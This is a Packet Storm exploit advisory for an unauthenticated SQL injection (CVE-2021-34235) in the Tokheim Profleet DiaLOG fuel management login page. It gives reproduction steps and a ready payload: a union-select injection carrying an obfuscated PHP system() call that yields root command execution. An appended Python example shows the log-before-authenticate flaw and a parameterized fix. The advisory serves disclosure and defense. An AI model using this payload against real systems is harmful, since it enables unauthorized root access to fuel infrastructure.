packetstorm | Golem445 | PACKETSTORM:165944
History: Feb 10, 2022 - 12:00 a.m.

Tokheim Profleet DiaLOG Fuel Management System 11.005.02 SQL Injection / Code Execution

2022-02-10 00:00:00
golem445
packetstormsecurity.com
EPSS: 0.002 (Low), percentile 56.6%

`# Exploit Title: Tokheim Profleet DiaLOG Fuel Management System 11.005.02 - SQLi (Unauthenticated)  
# Date: 02/9/2022  
# Exploit Author: golem445  
# Vendor Homepage: https://www.tsg-solutions.com  
# Tested on: Kali Linux  
# CVE: CVE-2021-34235  
# Description: Field__UserLogin parameter is vulnerable to crafted MySQL injection, resulting in remote code execution as root.  
  
==Steps to Reproduce==  
# Go to : http://dialog_host/login.php  
# Enter an escaped MySQL query into the username field and submit; the password doesn't matter. (Such as: ' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(“uname -a”);?>’ -- -)  
# This can also be accomplished via intercepting the logon submission with Burp Proxy, then entering your MySQL query into the Field_UserLogin parameter.  
  
==Notes==  
This vulnerability appears to be rooted in a logic flaw. In a typical authentication flow, a user submits their credentials, authentication succeeds or fails, and the result is then noted in a log. This application appears to work inversely, i.e. the logon attempt is logged, then the user's credentials are checked.  
`
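
The ordering described in the Notes means the log write handles unauthenticated input before any credential check, so that write has to treat the username strictly as data. The following is an added example, not the vendor's code and not part of the advisory: it uses Python and sqlite3 in place of the product's PHP/MySQL stack, and the table names, function names and the constructed probe string are assumptions.

```python
import hashlib
import hmac
import sqlite3

SALT = b"constructed-salt"  # constructed sample value

def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)

def make_db():
    # Hypothetical schema: one log table, one user table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login_log (username TEXT, outcome TEXT)")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw BLOB)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("operator", pw_hash("constructed-password")))
    return db

def log_attempt_concat(db, username):
    # Weak form: the submitted value becomes part of the SQL text.
    db.execute("INSERT INTO login_log VALUES ('" + username + "', 'pending')")

def log_attempt_bound(db, username):
    # Hardened form: the value is bound as data and never parsed as SQL.
    db.execute("INSERT INTO login_log VALUES (?, 'pending')", (username,))

def login(db, username, password, log=log_attempt_bound):
    # Log first, check credentials second: the order the Notes describe.
    log(db, username)
    row = db.execute("SELECT pw FROM users WHERE username = ?",
                     (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], pw_hash(password))

def logged_rows(db):
    return db.execute("SELECT username, outcome FROM login_log").fetchall()

if __name__ == "__main__":
    probe = "x', 'success') -- "  # constructed input, never authenticates
    for log in (log_attempt_concat, log_attempt_bound):
        db = make_db()
        print(log.__name__, login(db, probe, "anything", log), logged_rows(db))
```

With the concatenated write, the failed attempt is recorded with an outcome the caller chose; with the bound write, the same string is stored verbatim as a username.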
